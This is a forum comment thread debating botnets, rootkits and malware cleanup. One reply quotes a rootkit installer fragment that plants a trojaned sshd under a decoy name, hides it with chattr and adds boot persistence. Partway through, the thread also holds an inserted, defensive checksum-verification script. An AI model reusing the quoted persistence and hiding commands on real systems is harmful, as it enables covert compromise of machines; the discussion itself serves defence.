      Funny thing, I bought this house in a nice area, but a short walk from a high crime area. It was built in the 50's out of concrete block (two blocks thick on the ground floor). All the windows on the ground floor were glass block and could not be opened. The upstairs was the real living area with lots of windows, but a full story (slightly higher than a normal house) up in the air. It had a back deck on the second story, with no stairs going down and with the deck overhanging the supports a good three feet or more (making climbing it really hard). It also has a monitored security system (I've since updated). I haven't had a break in yet. :) It is the OpenBSD of houses.

  26. Why do you rob banks? by twitter · · Score: 5, Insightful

    ... because that's where the money is.

    You write about root kits and declare:

    Just by the virtue of the large number of x86 Linux servers exposed to the Intarweb, there must be thousands of systems just waiting to be rooted. Fortunately for "us", there are millions of exposed Windows client PCs running as Administrator, begging to be owned.

    As if the only difference was numbers. The other difference, or so claim the FUDsters, is that "Linux is for servers." You know, like banks and businesses that handle real money. Given the profile and importance of those targets, you would think they would be hit all the time and that we would hear about it as we hear of IIS exploits. For some reason we don't hear anything, despite the very open nature of the people running the software. It would seem that there's more at work than numbers here.

    On the desktop there's another crucial difference, the ease of recovery. In the Windoze world, you pull out your ancient "original" CD and put the same broken crap right back on your machine. It wipes out all your documents and settings so you suffer a loss for no gain. Then you are rooted again about 12 minutes after hooking up to a network. In the free world, you do a net install and get the latest and greatest of everything, without losing anything at all. A few extra steps can make sure the root kit is not in your home directory. The easiest is to chmod the files in your home directory to no execute. In the very worst case you can chmod and then tar up the documents you worry about and start fresh with your settings, like in the Windoze world but much easier.

    --

    Friends don't help friends install M$ junk.

    1. Re:Why do you rob banks? by Nutria · · Score: 3, Insightful
      Just by the virtue of the large number of x86 Linux servers exposed ... there must be thousands of systems

      As if the only difference was numbers. The other difference, or so claim the FUDsters, is that "Linux is for servers." You know, like banks and businesses that handle real money. Given the profile and importance of those targets, you would think they would be hit all the time and that we would hear about it as we hear of IIS exploits. For some reason we don't hear anything, despite the very open nature of the people running the software. It would seem that there's more at work than numbers here.


      Re-read my post, and then think.

      Some Linux servers will be vulnerable. Even if only 0.1% of Linux systems are vulnerable through SysAdmin neglect or unfixed bugs, if there are 10^6 systems there will be 1000 vulnerable systems.

      (I say servers because Linux desktops tend not to expose services to the Internet.)

      --
      "I don't know, therefore Aliens" Wafflebox1
    2. Re:Why do you rob banks? by twitter · · Score: 1, Interesting

      An oversized rat tells me to think, and offers a lesson in proportions and exponents:

      Re-read my post, and then think. Some Linux servers will be vulnerable. Even if only 0.1% of Linux systems are vulnerable through SysAdmin neglect or unfixed bugs, if there are 10^6 systems there will be 1000 vulnerable systems.

      So what? You want to replace that with systems that are ALL vulnerable to multiple attacks regardless of the competence of the administrator? Help me out Nutria, what are you trying to tell me? I don't see anything worth pondering above.

      --

      Friends don't help friends install M$ junk.

    3. Re:Why do you rob banks? by Anonymous Coward · · Score: 5, Insightful

      What do you think the C&C machines are running?

      Linux servers, especially colocated ones, tend to have a much higher uptime; in addition, the ircds and other servers they run tend to run best (or only) on Linux. A Linux shell box is a lot more useful to a blackhat than a Windows drone. This makes them individually more attractive targets.

      Imagine you're a blackhat. So what you're after, for a C&C server, is someone else's poorly-maintained Linux box; the one that the admin thinks is impenetrable, because it runs Linux, and so hasn't updated it or even looked at it in ages. It's going to have a high uptime, because it almost never reboots because the guy never installs a new kernel on it. You can probably spy out the uptime quietly in advance via the usual trickery, because some admin thought Linux boxes don't need firewalls. And you're most likely going to get in through a PHP hole (application or language, it doesn't matter when the language and common software is that poorly designed) or if it's really out of date an Apache or MySQL hole - because it's probably an almost-never-used webserver.

      And then you're going to install a rootkit - think l10n, only more so (there are actually some seriously hardcore Linux rootkits that blow pretty much all of the public rootkits for Windows out of the water when it comes to stealth; and this is why) - and then you're going to patch it, so no-one else roots your new 0wned C&C box, because nothing sucks more than some other blackhat stealing your botnet.

      Next thing you know, bam, the thing's running a modified hybrid-ircd or something, and is one of the magic servers you encoded in your trojan to which the Windows drones are connecting back, or one of the webservers they are getting the spam proxy or spyware installer from; and thus you, the blackhat, are earning nice fat sums of cash on the back of one or two Linux servers and a few hundred or thousand random Windows machines.

      So, don't discount the threat. All operating systems need patching and good security practice to run safely.

      And 0.1% seems like a low estimate; remember Linux distributions, especially server-oriented ones, tend not to have an automatic update feature (with good reason, to a point), so they do require manual intervention to patch. With appropriate care and feeding they are of course not just fine, but can be really quite secure; but neglected, it's a whole different story. Think closer to 2-3% as being a potential problem, and almost 5% in some (LAMP) brackets.

    4. Re:Why do you rob banks? by Nutria · · Score: 2, Insightful
      So what? You want to replace that with systems that are ALL vulnerable to multiple attacks regardless of the competence of the administrator?

      What gives you that idea?

      Because I recognize that Linux distros are not perfect, not all SysAdmins are up to snuff, and not all security bugs in all *ix apps have been discovered and patched, you think I am a Windows fanboi?

      --
      "I don't know, therefore Aliens" Wafflebox1
    5. Re:Why do you rob banks? by Nutria · · Score: 3, Funny
      someone else's poorly-maintained Linux box; the one that the admin thinks is impenetrable, because it runs Linux, and so hasn't updated it or even looked at it in ages.

      Sacrilege! Sacrilege, you Windows fanboi!!!! How dare you criticize the Holy Penguin!!!!!!!!!!

      --
      "I don't know, therefore Aliens" Wafflebox1
    6. Re:Why do you rob banks? by WilliamSChips · · Score: 1
      What do you think the C&C machines are running?
      I dunno, maybe Command and Conquer? Dumbass...
      --
      Please, for the good of Humanity, vote Obama.
    7. Re:Why do you rob banks? by 99BottlesOfBeerInMyF · · Score: 1

      What do you think the C&C machines are running?

      This is a good point and a lot of the IRC channels are running on rooted Linux boxes. What I find interesting is how the botherder community knowledge limits what they do. Linux desktops are not protected only by the fact that they are rare, but also by the fact that a lot of these people have no idea what they are doing beyond the tried and true tools. The community has the knowledge to root Linux servers and Windows servers, but aside from that they rely heavily upon metasploit type tools and existing code. If either platform undergoes a security transformation, expect the other to be the exclusive control channel for a while.

    8. Re:Why do you rob banks? by twitter · · Score: 1

      I'll take that as a "no" response. You obviously think that free software is a superior alternative. Thanks!

      --

      Friends don't help friends install M$ junk.

    9. Re:Why do you rob banks? by dougmc · · Score: 1
      the ircds and other servers they run tend to run best (or only) on Linux
      It's been a while (around ten years?), but back when I ran a few (legitimate) IRC servers, I found that in general ircd on FreeBSD worked much better on the same hardware than Linux did, being able to handle roughly twice as many users and crashing (sometimes the entire box) far less often while doing so. ircd is pretty hard on your networking stack when you have hundreds (back then -- now servers do thousands) of simultaneous users. To be fair, Linux's networking code has certainly improved greatly since then, so maybe the difference is much smaller now.


      Of course, there are probably 10x as many Linux servers out there as FreeBSD servers, and really, your arguments wouldn't be any less spot-on if you replaced Linux with just `*nix' (except that it wouldn't surprise me if many of the new ircds only worked under Linux as you suggested -- portability isn't nearly as important to many as it used to be), so it's not really a big deal.

    10. Re:Why do you rob banks? by Anonymous Coward · · Score: 0

      What a stupid, worthless fucktard.

  27. However, sad but true... by Jugalator · · Score: 1
    The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system

    However, even that might not help if the OS in question is Windows XP and not integrated with SP2 on the same CD, and you don't know what you're doing (like disconnecting the network until you've installed SP2, which you of course had lying on another disc so you don't need to go online for it).

    Pretty annoying what a highly flawed and widely spread OS can do.
    --
    Beware: In C++, your friends can see your privates!
  28. they already do that. by twitter · · Score: 1

    Congratulations, you noticed the reason that studies show Windows has a 12 minute half life on any network.

    The ISP would be far better off supplying hardware router/firewalls to their customers gratis because of the reduced traffic load from zombie computers.

    The cable modem already does that but it does not work. They block outbound ports and limit the upload speed. You can't block the inbound ports because you would block services users would actually notice. Even if you could lock up everything and only use one port for inbound and one port for outbound, the root would come through your browser or email. The bottom line is the computer on the other end has Windoze and Windoze has problems you can't fix with a router or an anti virus program. Without Windoze, you would not need any of the above, performance limiting crap.

    --

    Friends don't help friends install M$ junk.

  29. Link to the original paper by Loualbano2 · · Score: 1

    More technical version:

    http://www.lurhq.com/mocbot-spam.html

    There are more interesting papers on lurhq's site:

    http://www.lurhq.com/research_threat.html

    -ft

  30. My ISP does this. by PotatoHead · · Score: 1, Interesting

    I've one XP home box running.

    (We play online poker ok?)

    It got infected with this crap and started spewing spam. Primary cause of this is kid browsing BTW. They are the most likely to click on the baddies. Put 'yer kids on Linux or a Mac and lots of this just goes away.

    Within a few hours I got a call on my cell. Asked me what I wanted to do. I said pull the plug if the box is still spewing in a few hours. (That was time enough for me to get home and deal.) I arrived home, pulled the plug on the offending box, started archiving data in preparation for a re-image. Shot off a quick e-mail asking them to check for baddies on their end just to be sure. All done, next.

    This is exactly why the ISP consolidation is just horrible. Had we continued to have a high percentage of live and local ISPs, people would have someone they could trust to let them know things are not as they seem.

    I know my ISP sysadmins by name. Most people should. I don't talk with them much, but when I need to, it's always worthwhile. Nice folks --we need more of them.

    BTW: Joey http://www.spiretech.com/ If you are in PDX, give them a call.

    1. Re:My ISP does this. by despisethesun · · Score: 1

      It got infected with this crap and started spewing spam. Primary cause of this is kid browsing BTW. They are the most likely to click on the baddies. Put 'yer kids on Linux or a Mac and lots of this just goes away.

      You must not deal with a lot of "normal" computer users. Believe me, the average user is at least as bad as any child you've left on one of your computers. Left to their own devices (i.e. without an IT department to baby them) these people will wreak all manner of havoc. But who am I to complain? Stupid users are keeping me employed.

      --
      This poo is cold.
    2. Re:My ISP does this. by Anonymous Coward · · Score: 0

      (We play online poker ok?)

      No. Not ok. Online poker sites pay for a huge amount of spam, especially stuff like forum comment spam and domain squatting. That's like saying "We send free iPods to the widows of Nigerian princes, then refinance our mortgage and buy knockoff rolex watches and cheap v.1.4.g.R.a with the profits, ok?"

  31. ISP should warn by zymano · · Score: 1

    There should also be a mandatory rule about not using Windows XP without firewall and virus protection. It's a useless operating system.

  32. A change is coming and the Vista is beautiful ! by Anonymous Coward · · Score: 0

    How much do you know about Windows Vista and how it changes this?

  33. I say we nuke the server from orbit by gijoel · · Score: 1

    It's the only way to be sure that it's free of malware.

  34. correction by thinsoldier · · Score: 1

    CORRECTION:
    The only way to be [completely] sure the system (Windows) is malware-free is to completely wipe the hard drive and reinstall (Windows) the operating system.

    get it right.

  35. You have to wonder by gx5000 · · Score: 1

    You have to wonder... I mean, of course it's a disaster out there, we're not setting up newbies with enough education or software. I set up my users with XP SP2, Norton, Pest Patrol, Spybot, Norton Ghost or Acronis and a router and a promise to "try" and stay away from googling porn. Out of ninety regulars on my phone, only three of them need re-image instruction once in a while. Malware? What malware?

    --
    End of Line.
    1. Re:You have to wonder by Anonymous Coward · · Score: 0

      Maybe there are no infections detected because after the many layers of security band-aids installed like Norton, Pest Patrol, etc., the remaining 10% CPU resource left over is not enough to get on the Internet?

    2. Re:You have to wonder by gx5000 · · Score: 1

      LOL, huh, ok....lol The point is, was, that all these resources don't take up that much (re: Norton is Corporate, not the retail crap), and once the first OS setup is complete they have an image to fall back on if they suspect they are compromised. As long as you set up their pst file and their "My Documents" to point to another drive, they lose nada when they re-image and then they're clean. I don't know many techs that set up their users like that, to the point that they only call me up to thank me and ask functionality questions, other than to buy me beer ;-)

      --
      End of Line.
  36. BartPE? by ecalkin · · Score: 1

    I realized that BartPE could be a handy tool for cleaning up stuff. If nothing from the hard drive is in memory when Bart is running, it can't stop tools running under Bart from cleaning the crud out.

    I also realized that with the many plug-ins that Bart has, you could make a fairly usable static system with it. It gets infected? Reboot. It gets questionable? Reboot.

    e

  37. Then beg for another activation by HangingChad · · Score: 1

    The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.

    The only way to be sure on a WINDOWS system is to reinstall the operating system, something that Windows users just seem to accept. Then you have to beg MSFT to reactivate your operating system. If you reinstall routinely, some day they'll start acting like you're expected to pay for it...again.

    I have one token XP Pro box on my network but don't routinely use it to surf the internet (except when it's rendering video). Email, most of my online work...all Linux. Windows is a fine operating system, just don't connect it to the internet.

    --
    That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
    1. Re:Then beg for another activation by Joe+U · · Score: 1

      The only way to be sure on a WINDOWS system is to reinstall the operating system, something that Windows users just seem to accept.

      Actually, there are two methods available, one is to reinstall, which takes a few hours. The other is to clean the system and do a comparison from the original media/sources, which would take longer, so it's easier to reinstall. Either way, these are ONLY METHODS FOR ANY OS that guarantee you are not infected.

      Then you have to beg MSFT to reactivate your operating system. If you reinstall routinely, some day they'll start acting like you're expected to pay for it...again

      Yeah, you keep ranting and raving on about that. It's a load of crap and not true at all, but don't worry, it sounds good. Eventually, if you yell loud enough and jump up and down while waving your hands, people might listen or even take you seriously.

      Granted, you'll be acting like a spoiled brat, but hey, it works for politicians.

    2. Re:Then beg for another activation by Anonymous Coward · · Score: 0

      So if your Linux/OS X/whatever OS happens to get infected with malware (or R00t3d), there is some magical way to determine if you've removed it all? Why don't you enlighten us? I don't care what OS you run, if you get hacked the only way to be 100% sure you've removed any malware is to reinstall the OS.

      I've been using Windows for years now and have yet to get an infection of any sort (viruses or spyware).

    3. Re:Then beg for another activation by Nicolas+MONNET · · Score: 1

      Boot from a CD, chkrootkit, check RPM MD5s ... it might not be 100% reliable but it's damn close, and it takes 10min. I'd like to know how you do this under Windows. Oh, that's right, you don't.

  38. Sometimes even a reinstall won't help by Anonymous Coward · · Score: 1, Interesting

    > The only way to be [completely] sure the system is
    > malware-free is to completely wipe the hard drive
    > and reinstall the operating system.'"

    I am not sure of this. What about those hardware devices where one can upgrade the firmware without setting a jumper? In other words, everything happens in software. What if, say, malware replaces the BIOS on one such device? Then even an OS reinstall won't help. You are owned on a lower level than the OS. AFAIR, some modems were susceptible to this.

    Vilmos

    1. Re:Sometimes even a reinstall won't help by Datamonstar · · Score: 1

      They are in the wild. Rare, I'm sure, but I have seen them. If it's not checksummed to a fairly decent degree you can believe a hardware device is able to be subverted at the hardware level if physical switches are not used to prevent an overwrite. In my opinion, EVERY hardware device with a flashable firmware chip on it should include physical security for this reason.

      --
      The eternal struggle of good vs. evil begins within one's self.
  39. Moo by Chacham · · Score: 2, Insightful

    The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.

    Or MD5 everything.

    1. Re:Moo by Anonymous Coward · · Score: 0

      SHA if you wish to be cryptographically secure

  40. Live CD Virus Scanner by Nom+du+Keyboard · · Score: 3, Insightful

    What users need, and I'm continually surprised that it isn't here already, is a Live CD Virus scanner. Download the ISO, burn the CD, boot it on suspect machines, and let it do the job of reading your system disc as a simple data disc. The idea that a program running on an infected system can spot and remove the infection seems questionable at best.

    --
    "It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
    1. Re:Live CD Virus Scanner by modulo · · Score: 1

      Here you go: http://www.bitdefender.com/bd/site/presscenter.php?menu_id=25&n_id=84/ I've used an earlier incarnation, works well.

      --

      ...but the language is MUMPS, which I will not utter here

    2. Re:Live CD Virus Scanner by Nom+du+Keyboard · · Score: 1
      Here you go http://www.bitdefender.com/bd/site/presscenter.php?menu_id=25&n_id=84/ I've used an earlier incarnation, works well.

      Went to the site, but I don't immediately see how this will scan Windows system from a Live CD that should be able to spot and remove rootkits that would evade detection when running under the operating system itself. They look more like they're into Linux solutions.

      --
      "It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
    3. Re:Live CD Virus Scanner by modulo · · Score: 1

      LinuxDefender runs Linux off of the CD, but uses Captive NTFS to mount the NTFS partitions on your hard drive and scan them.
      (You'll need an XP license to be able to use XP SP1 to extract the NTFS drivers--if you use FAT32 that won't be an issue.)

      I notice they pulled the download but it's still available from the mirror at http://ftp.iasi.roedu.net/mirrors/ftp.bitdefender.com/pub/Live/, see
      http://buy.bitdefender.com/bd/site/mirrors.php/.

      --

      ...but the language is MUMPS, which I will not utter here

  41. reinstall troubles... by Tom · · Score: 2, Informative

    The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'

    Yes, and your average user will quickly encounter another funny problem: he has a good chance of being infected again before the download of SP2 and/or the other security updates he needs in order not to be re-infected is finished...

    --
    Assorted stuff I do sometimes: Lemuria.org
  42. No, no, no... by adamofgreyskull · · Score: 1

    He has it wrong, you have to take off and nuke the entire site from orbit. It's the only way to be sure.

  43. blah blah by Anonymous Coward · · Score: 0

    "He can put whatever he wants on your machine, and there's no way to be 100 percent sure that the machine is clean."
    - right, so one cannot perform a man-in-the-middle "attack" to see what traffic is going into / out of a suspect machine.

    "The lesson here is once you get infected, you are completely under the control of the botmaster."
    - a trojan/bot whatever has the same user rights as the person executing it.

    the real threat of any trojan/virus/bot is bad code in the host OS, allowing for buffer overflows, underruns etc. that's all. looking forward to buffer overflow protection in the hardware / CPU

    just wondering how long it is going to take for the win95 mentality about file permissions / access rights to go extinct. truly amazing that a computer can not just make you smarter but also dumber ...

    FUD

  44. Re:Windows Live CD? by protobion · · Score: 1
    Did you know about this?

    Window Live CD

    --
    Essentia non sunt multiplicanda praeter necessitatem.
  45. what is new by Anonymous Coward · · Score: 0

    So once a machine is infected the trojan can and does install anything it wants? And someone can spy on a botnet - what is new?

  46. Go to the D.M.C.A by Anonymous Coward · · Score: 1, Funny

    Of course, since he effectively broke a digital access control (reverse-engineering "trivial" encryption) and then ran the program in ways that the author did not explicitly permit (in a sandnet) then he's a criminal as bad as DMCA Jon.
    AC

  47. It's a circular zen thing.... by Joce640k · · Score: 1

    If you really think reinstalling is the answer then reinstalling is *not* the answer - you're so clueless that you'll be reinfected within a week.

    There are very few Windows machines which can't be fixed if all they have is a malware infection. All it normally takes is a reboot in safe mode, run an antivirus and a malware scan, then look in "...Whatever\Current_Version\Microsoft\Windows\Run" and google the names of all the .exe files in there.

    Next, uninstall anything made by Symantec from the machine. It's all useless, every single byte of it. There's not a virus on the planet which doesn't know how to disable Norton Internet Security.

    While you're at it, you can delete all the, um, "legitimate" stuff you find in the Registry's "Run" key. Most of it isn't needed and your machine will boot a lot faster without all those dumb printer driver accessories, Apple Quicktime crap, etc.

    Sure, it's theoretically possible that this could fail, but in practice it doesn't. Virus writers don't need to do anything more than this to infect a Windows machine, so they don't bother.

    --
    No sig today...
    1. Re:It's a circular zen thing.... by electronerdz · · Score: 1

      Thank you! Malware is not impossible to get rid of. You just need to know where it hides. And just because you have to reboot a couple of times doesn't mean the method is failing. And I completely agree on Symantec. It gives a significant speed boost. The reason most "shops" have a problem with removing it correctly is because they don't know what they are doing, like the Geek Squad or whatever it is at Best Buy. And reinstalling is not any quicker when you factor backup and restore into the time, which a responsible tech should do.

      --
      Kernel Krunch - Part of a Complete OS
    2. Re:It's a circular zen thing.... by TheRaven64 · · Score: 1
      Once a machine is compromised, you have no way of knowing how compromised it is. A piece of malware can patch the filesystem driver to hide itself, it can patch the process table so that nothing lists it as running. See the Sony rootkit for more information.

      Just because you've found one piece of malware, or even ten, does not mean that you have found them all. The only way you can guarantee that you have got all of them is to re-install, and bring all of the latest security updates to the machine on removable media; don't even connect it to a LAN until it is fully patched.

      --
      I am TheRaven on Soylent News
  48. bad advice by annakin · · Score: 1

    Completely wipe the hard drive? Can he provide an example when this was necessary? Or even a theoretical example of how nascent files on a hard drive would assist in re-cracking the machine?

    1. Re:bad advice by Alex+Belits · · Score: 1

      A fragment of a rootkit that I have found ($basedir/bin/ssh.tgz contains .sh directory with various files including trojaned sshd):

      mkdir /lib/security 2>/dev/null
      mkdir /lib/security/.config 2>/dev/null
      mkdir /lib/security/.config/ssh 2>/dev/null

      [...]

      cd $basedir/bin
      tar xfz $basedir/bin/ssh.tgz

      [...]

      cd $basedir/bin
      mv .sh/* /lib/security/.config/ssh/
      chattr -AacdisSu /usr/sbin/xntps 2>/dev/null
      cp /lib/security/.config/ssh/sshd /usr/sbin/xntps
      mv /lib/security/.config/ssh/sshd /lib/security/.config/
      chmod 755 /usr/sbin/xntps /usr/sbin/xntps -q
      chattr +isa /usr/sbin/xntps
      echo "# Xntps (NTPv3 daemon) startup.." >> /etc/rc.d/rc.sysinit
      echo "/usr/sbin/xntps -q" >> /etc/rc.d/rc.sysinit
      chattr +is /etc/rc.d/rc.sysinit

      --
      Contrary to the popular belief, there indeed is no God.
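The "boot from a CD, check the checksums" approach from comment 39 and Nicolas MONNET's reply, applied to the rootkit fragment above, as an added example that is not part of the thread or of any product mentioned in it: a POSIX shell manifest tool that hashes every file under a suspect root (the infected disk mounted read-only from a live CD) with SHA-256 instead of MD5 and reports what changed, vanished or appeared since a known-clean snapshot. The root and manifest paths are parameters; /mnt/suspect in the comments is only an illustrative placeholder.

```shell
#!/bin/sh
# Added example, not code from the thread. Offline integrity check:
# hash every regular file under a suspect root (e.g. /mnt/suspect, mounted
# read-only from a live CD) and compare against a manifest taken while the
# system was known clean. Run against the rootkit fragment above, this
# reports ./usr/sbin/xntps and ./lib/security/.config/... as NEW and
# ./etc/rc.d/rc.sysinit as CHANGED, which is what the script worked to hide.
# Limitation: file names containing newlines are not supported.
set -u

# make_manifest ROOT MANIFEST: write sorted "<sha256>  ./relative/path"
# lines, relative to ROOT so the manifest does not depend on the mount point.
make_manifest() {
    root=$1; manifest=$2
    ( cd "$root" && LC_ALL=C find . -type f | LC_ALL=C sort |
        while IFS= read -r f; do sha256sum "$f"; done ) > "$manifest"
}

# verify_manifest ROOT MANIFEST: print one line per discrepancy
# (CHANGED, MISSING or NEW followed by the path); return 0 only when the
# tree under ROOT matches the manifest exactly.
verify_manifest() {
    root=$1; manifest=$2; status=0
    # Pass 1: every recorded file must still exist with the recorded hash.
    # "read" splits the sha256sum line into the hash and the path.
    while read -r expected path; do
        if [ ! -f "$root/$path" ]; then
            echo "MISSING $path"; status=1
        elif [ "$(sha256sum "$root/$path" | cut -d' ' -f1)" != "$expected" ]; then
            echo "CHANGED $path"; status=1
        fi
    done < "$manifest"
    # Pass 2: anything on disk the manifest never saw (dropped binaries,
    # hidden config directories) is NEW. The loop runs in a subshell, so
    # its output is collected and tested instead of setting status inside.
    known=$(cut -d' ' -f3- "$manifest")
    new=$( ( cd "$root" && LC_ALL=C find . -type f ) | while IFS= read -r f; do
        printf '%s\n' "$known" | grep -qxF -- "$f" || echo "NEW $f"
    done )
    if [ -n "$new" ]; then printf '%s\n' "$new"; status=1; fi
    return "$status"
}
```

The manifest must be taken and stored off the suspect machine; a manifest that lived on the compromised disk proves nothing, since anything with root could rewrite it along with the files.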
  49. Deal. by PotatoHead · · Score: 1

    1. You are an anon poster. Want to actually discuss something? Get an account, so we can deal on level ground, or STFU.

    2. I get tons of spam. Sometimes ~1000 per day. I don't think I've ever seen a poker spam. This is a myth and is normally trotted out by those opposed to the whole idea of online poker.

    3. All of those comment spams are tied to affiliate accounts. Have a problem with them? Contact the site and send them the link to the spam. It will be dealt with. The spammer will likely lose their affiliate status and the dollars they have accrued to date.

  50. you and reborndata by Joseph_Daniel_Zukige · · Score: 1

    A guy with a number that low _can't_ be that clueless, can he?

    Anyway, no, as others have said, once you know the box has been penetrated there is no way to be sure you've cleaned every corner where something bad can hide.

    Of course, the only really safe thing to do is pull all HDs, mount them on a known clean box (preferably a different OS to provide a discontinuity), back up the data forks of the important data files, and scrub the drives with the lowest level format that the drive itself can recover from.

    Unimportant data like home movies and pictures should just be written off. Hopefully, the originals are stored off-line on something not easily writable without human interaction.

    On the other hand, if the user in question doesn't care whether he is unwittingly part of a botnet or potentially giving his credit card number away, by all means, just clean the malware off and keep going until it chokes up again.